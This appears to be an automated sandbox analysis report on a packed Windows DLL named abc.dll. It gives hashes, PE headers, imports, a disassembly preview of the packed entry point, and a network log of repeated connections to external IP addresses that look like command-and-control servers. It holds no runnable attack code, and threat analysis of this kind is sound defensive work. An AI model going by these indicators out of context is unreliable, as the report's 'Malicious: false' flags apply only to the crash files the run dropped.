SHA-512:	1A51C7465E1F20EB5B2EF283D4CBA6B01D5EB606770A1CE56BDD8870EE2913E9AD10930985C19F4996D39C84794B745BFD4585F0D77C9F02DBE3CCFF0D15B861
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.9.6.3.1.7.6.0.8.7.1.7.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.9.6.3.1.7.6.3.7.3.1.1.4.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.9.8.a.c.2.c.-.a.4.0.5.-.4.5.4.9.-.9.8.2.1.-.9.d.a.6.7.d.9.b.f.9.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.3.7.a.e.9.f.-.d.4.5.2.-.4.a.5.4.-.a.0.e.b.-.b.8.1.3.6.3.0.f.c.1.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.3.0.-.0.0.0.1.-.0.0.1.6.-.0.e.b.6.-.b.2.2.7.7.f.2.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_80fa17708444a2c77e77e66eb43423f94a9dfb63_82810a17_0a7b9719\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0171793634245108
Encrypted:	false
SSDEEP:	192:w1iG0oXUHBUZMX4jed+57wUP/u7sFS274ItWc:OigXcBUZMX4jec/P/u7sFX4ItWc
MD5:	62CF4068452243EAEA34BDA0241DA77D
SHA1:	B5D95FE685923C60BE88282696C6C3687A313C6A
SHA-256:	B91883D4AAC2704234C1F7693FB873193CBB2D98BE947A02E1593218D562018C
SHA-512:	15CD38B1B90A6FC4284C02C2D57839BFA4CD8468B4FC7CD9D9EBEEA5F15DF4A1A7B524A27ED3C450FCC5B8969F14BC9E0BD8E5D2E58469AC4377C0D4C33F17AC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.9.6.3.1.7.5.4.1.6.4.5.6.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.9.6.3.1.7.5.7.3.2.0.8.9.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.e.9.a.7.5.8.-.1.4.1.f.-.4.3.0.9.-.b.8.7.8.-.8.f.4.7.d.b.a.6.6.2.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.0.f.1.1.5.6.-.6.d.c.f.-.4.8.c.7.-.9.8.b.5.-.0.0.e.8.3.7.b.d.c.4.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.c.-.0.0.0.1.-.0.0.1.6.-.4.f.9.b.-.e.7.2.4.7.f.2.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8259.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Feb 18 04:22:35 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	47300
Entropy (8bit):	2.162858492135586
Encrypted:	false
SSDEEP:	192:ejnpyZ9x1ed0pNgNYuZRO5SkbhBKBJ/QiD1RY2MGfMohBzYoAnl4N:gIaCpNWE5Lbh8/QiEjGfMohBzYTK
MD5:	5B9CAA3EFA25911056C03E75AA1E3A82
SHA1:	DA0193FC91E5C91E19DB0B9375449197F7F532DD
SHA-256:	4F8B5F656EDEE1C67FC8689557E76D35DF94E206B7F21E082582219941E89CF3
SHA-512:	A1107103A681F03843401C375292B432EDDF0838EC7C185FFB3E3202530672DB88E3919950CDE6B4069396FDB92ADCEAE432267129C072C91C71AFA554A0A645
Malicious:	false
Preview:	MDMP....... ..........b.........................................4..........T.......8...........T...........H...\|............ ..........p"...................................................................U...........B.......#......GenuineIntelW...........T..............b.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8874.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8272
Entropy (8bit):	3.6914100474180014
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiNH6i666Yx06D4gmfTOS/Cprd89bJ9sf8jm:RrlsNiN6y6YS6D4gmfTOSNJ2fl
MD5:	6BEF64FFFE0FEA11A8F5B6FD4F9BF02F
SHA1:	6554498306D0D69CA117BB51C00BA84740F6AF88
SHA-256:	40181593E3AE95DD5B1D6B45AC3077949F2708651106B13544833ADD127ADB27
SHA-512:	00C6204014C56015C6A62D8B8CFE9FA7A7047B159F8CB0E06CE32B8874C6812AC6620ACCE45CEB0BA014BDE58103451BA94E0B6ABF7910637B0F8C762533D64F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A2B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.454279436817118
Encrypted:	false
SSDEEP:	48:cvIwSD8zscJgtWI9KMWSC8B2n8fm8M4JCds76FR+q8/MrM04SrSEd:uITfallSNcsJdyzM0DWEd
MD5:	29A69C9F85693448C81BAC0BD12E865E
SHA1:	887B9DCD9F9A54E192110043CA54B6078CF01724
SHA-256:	039B319D7E4BECD9FC1B457CFC81033289F4854A73E7E39806917EEF1F6C28D7
SHA-512:	ED077C0AC6A7F3034F1A4E7335C641643E70AF97679B7ED75A0CD90F0DC0CABC1CFA458314478938AAC82D7B9E52E58CBB2B29FCB5AB79DE72F71464CC45595A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1391853" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C88.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Feb 18 04:22:41 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	47346
Entropy (8bit):	2.1538940665132964
Encrypted:	false
SSDEEP:	384:W69pNE5LbZMpZyClE0EXSfy8YhZ/uL9Xh6Nu:W4p6VbZQyFXB8YD66k
MD5:	EFD1F782C6E3C87C9E2DDC6C26BF275C
SHA1:	FADFCA208A24918CCA476F614A2A876482AC381F
SHA-256:	AB40F7E733F5A0007CF6FFFBD71BB4143BA800FB857211353F63819787574E38
SHA-512:	66FF42926AAB9FF3AEEE038CC9D46ECF9DEB3A8D499DCA5BAF2748A57264D517EB6A1A01B0FC22B8EAB174840BDD6CDAB53AFEAB2951B6D78F450A773160F22B
Malicious:	false
Preview:	MDMP....... ..........b.........................................4..........T.......8...........T........... ............... ..........p"...................................................................U...........B.......#......GenuineIntelW...........T.......0......b.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA207.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8252
Entropy (8bit):	3.689254887467385
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNibr696YpW6IgmfTOS/Cprk89bBjsfFCrm:RrlsNiX696Yo6IgmfTOSGBIfF3
MD5:	60239EB558CA598BF3DF75B57D41AA34
SHA1:	205F41424FDA62053CD5F1AA5124D452DA7F3279
SHA-256:	6C8BE1EFEE076B771851CD97AABC2E6F3C43362A2B3ECD6D4C8A29891E093CD1
SHA-512:	1822595FB4A1E3C68479EA6DBE6AEE9127007412CF2F17471F5C3555BB897FCE1114F9BA35D3E614FCA038EEC0A75F99E2A6AF04DF14C80BC3A49404843E68E5
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA360.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.452143976528709
Encrypted:	false
SSDEEP:	48:cvIwSD8zscJgtWI9KMWSC8Bm8fm8M4JCds76F845++q8/MrPBE04SrSid:uITfallSN5JdCQzPBE0DWid
MD5:	38E745E346C15E750B826783DACC215F
SHA1:	C4DBFAF2F6A8CB821B4A1B4A58F8D5871183CC36
SHA-256:	BED9F5CB642A0A3D58D7366734F5AD4409C356F53C1097546DFB66D061C3CA8F
SHA-512:	9BD8816715937EE822F82314D839074305D6CB4D90DC0F7BF67FDDC507884F54EAD703F8B67E2EE1D5963E25EED8B13F30BA54E729B75A72B8244BC705A7B2E6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1391853" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.26630677573255
Encrypted:	false
SSDEEP:	12288:dztKJGAy/CuOo9ue4woquNUkWUfc4cV8Vs6tmkq1ujNZ8cz4TQDsCCdt:dtKJGAy/CuOo9uetwlUt
MD5:	2FC1C9C382DBCEE5B71A0C19E92C37C9
SHA1:	D5C9ACE1C643C9BF4704834D4416C062B2A013F9
SHA-256:	ED6823D74DCD3E153E1815B684EA57CDFA6D81E360500380F72F937841865EE0
SHA-512:	C71DE98356CB24ECA7AC76FC12E5409AE76DC21CB57A527A2CEA354E6A629F35FE7FD2A4D8377918A60A35FA3D0BA98187BBD19EDB2A3B20060C51D0E5BB52ED
Malicious:	false
Preview:	regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..&.$...............................................................................................................................................................................................................................................................................................................................................N.{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.8414398684418796
Encrypted:	false
SSDEEP:	384:BRkW5cZrdudXX5OQp8XXLnxOf2obPmxwp65GjZmGuFDTTej5N5rAR1H:BSYCrAXXTpigf2oaxwpmWmGuVTeNN5Mz
MD5:	DD5ED7F212ECDD8A5D54FCD9F0F6A50F
SHA1:	0C3949C5D05C488BFEB473C625755587DBE7C535
SHA-256:	70CA5452E16AD21F1FF1BE957601D6F4AE83AF7BB7E2A278DFF061188653D339
SHA-512:	5FD34A403BDB7CB049CA658F930301E80D31FADD86D123AEA8E89EF7FC4F1635083E6AA4E45AC1C136294A76E783D206641CBCC5C6BD825D3B4394F9C2EA290F
Malicious:	false
Preview:	regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..&.$...............................................................................................................................................................................................................................................................................................................................................N.{HvLE.^......P...........{....Y....@.f+H............................. ..hbin................p.\..,..........nk,..<.&.$.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..<.&.$...... ...........P............... .......Z.......................Root........lf......Root....nk ..<.&.$...................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
Entropy (8bit):	7.838279679201665
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 90.54% Win32 EXE PECompact compressed (v2.x) (59071/9) 5.34% Win32 EXE PECompact compressed (generic) (41571/9) 3.76% Generic Win/DOS Executable (2004/3) 0.18% DOS Executable Generic (2002/1) 0.18%
File name:	abc.dll
File size:	215157
MD5:	4095efe5247d786f5c8f03ee2678fe0a
SHA1:	8fabbc1778b684e161d312a28aa16f065c3bf330
SHA256:	a5d3d3c385f1405b606bd2427f625f24c81266bca36d552f5eb61dc82f887276
SHA512:	975b6e784191bd8e968bd9794022a7e2bee55f3cb1ec5ea57e6df008f5e4803c52d7fd671e5fe022d3dfb43f1225adb479ae725aede4f800a4ed2c20858ee368
SSDEEP:	3072:MI/38csWuZwCMZ9kfuZJR+go6+n05NkxbmUVg/GXJb8Rps6T+y:9MIuSrZJR+gopn6sCShm+y
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x1005c293
Entrypoint Section:	.rsrc
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5665074D [Mon Dec 7 04:13:01 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e04371d2deed5fef96eec468f2602fea

Entrypoint Preview

Instruction
mov eax, 1005D0A0h
push eax
push dword ptr fs:[00000000h]
mov dword ptr fs:[00000000h], esp
xor eax, eax
mov dword ptr [eax], ecx
push eax
inc ebp
inc ebx
outsd
insd
jo 00007F73B8D556C3h
arpl word ptr [edx+esi+00h], si
add byte ptr [eax], al
or byte ptr [eax+eax], cl
dec eax
loope 00007F73B8D55663h
push esi
push edi
push ebx
push ebp
mov ebx, dword ptr [esp+1Ch]
test ebx, ebx
je 00007F7376BD7811h
push cs
out 60h, al
or eax, 72656B0Bh
outsb
insb
xor esi, dword ptr [edx]
adc al, 44h
push es
mov eax, C08513FFh
cmp byte ptr [edi+0CE8F08Bh], cl
xor eax, dword ptr [esi+6900ECE3h]
jc 00007F73B8D556D6h
jne 00007F73B8D556C3h
insb
inc esi
sbb bh, bh
push ebx
add al, 3Eh
mov dword ptr [8BFFC4D0h], eax
call 00007F735C1671D7h
xor eax, dword ptr [edi+636F6E15h]
sbb al, 58h
mov esp, dword ptr [esp+edx]
jl 00007F73B8D555F1h
sar ecx, FFFFFFA1h
sbb byte ptr [edx+68h], ch
adc byte ptr [eax-01h], cl
pushad
clc
cmp dword ptr [ecx], 3F33D008h
mov ebx, eax
push eax
push esp
jbe 00007F73B8D55666h
push edi
or byte ptr [eax], cl
lea eax, dword ptr [esi+0Fh]
inc edx
aad C9h
stc
mov dh, 0Ch
add eax, FF0C300Dh
adc dword ptr [esi], ecx
push eax
push ebx
call 00007F737D58FF88h
sub byte ptr [edx+58h], bl
je 00007F73B8D55665h
int3
adc dword ptr [edx], esi
jne 00007F73B8D55695h
dec eax
push eax
add byte ptr [eax+53h], FFFFFFD5h
pop eax
push eax
add byte ptr [edx], cl
push eax

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168
[LNK] VS98 (6.0) imp/exp build 8168
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5bf10	0x63	.rsrc
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c004	0x2f3	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x57000	0x4efc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0x18	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x56000	0x2e000	False	1.00035028872	data	7.99891570226	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x57000	0x7000	0x6200	False	0.432278380102	data	4.95304384319	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x5e000	0x1000	0x200	False	0.05859375	data	0.22872628451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
TYPELIB	0x57070	0x4e8c	data	English	United States

Imports

DLL	Import
kernel32.dll	LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree
MFC42.DLL
MSVCRT.dll	tolower
USER32.dll	GetDesktopWindow
ADVAPI32.dll	RegEnumValueA
WS2_32.dll	bind
SHLWAPI.dll	PathIsDirectoryA
ole32.dll	CoCreateInstance
OLEAUT32.dll	SysAllocString
MSVCP60.dll	?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
NETAPI32.dll	Netbios

Exports

Name	Ordinal	Address
Dispatch	1	0x10008656
InputFile	2	0x1000678b
PrintFile	3	0x1000443d

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2022 20:22:27.845047951 CET	49751	18530	192.168.2.5	107.163.56.231
Feb 17, 2022 20:22:27.845228910 CET	49752	18530	192.168.2.5	107.163.56.110
Feb 17, 2022 20:22:30.863785982 CET	49752	18530	192.168.2.5	107.163.56.110
Feb 17, 2022 20:22:30.895000935 CET	49751	18530	192.168.2.5	107.163.56.231
Feb 17, 2022 20:22:36.879841089 CET	49752	18530	192.168.2.5	107.163.56.110
Feb 17, 2022 20:22:37.004913092 CET	49751	18530	192.168.2.5	107.163.56.231
Feb 17, 2022 20:22:50.075361967 CET	49762	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:22:53.055465937 CET	49763	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:22:53.057245016 CET	49764	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:22:53.240674973 CET	49762	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:22:56.225308895 CET	49763	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:22:56.225333929 CET	49764	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:22:56.939627886 CET	49765	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:22:57.126286030 CET	49766	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:22:57.410754919 CET	49767	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:22:57.825294018 CET	49768	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:22:59.241122961 CET	49762	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:00.225594044 CET	49766	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:00.538079023 CET	49767	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:00.835042000 CET	49768	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:01.151609898 CET	49769	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:01.263386011 CET	49770	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:01.658067942 CET	49771	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:04.225925922 CET	49769	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:04.335351944 CET	49770	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:04.726066113 CET	49771	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:05.186161041 CET	49772	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:05.302572966 CET	49773	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:05.656567097 CET	49774	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:08.226280928 CET	49772	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:08.335701942 CET	49773	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:08.726299047 CET	49774	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:09.328409910 CET	49775	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:09.332163095 CET	49776	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:09.418652058 CET	49777	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:11.421793938 CET	49779	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:12.335994959 CET	49775	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:12.351654053 CET	49776	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:12.554766893 CET	49777	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:13.354952097 CET	49782	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:13.531780958 CET	49783	18963	192.168.2.5	107.163.56.232
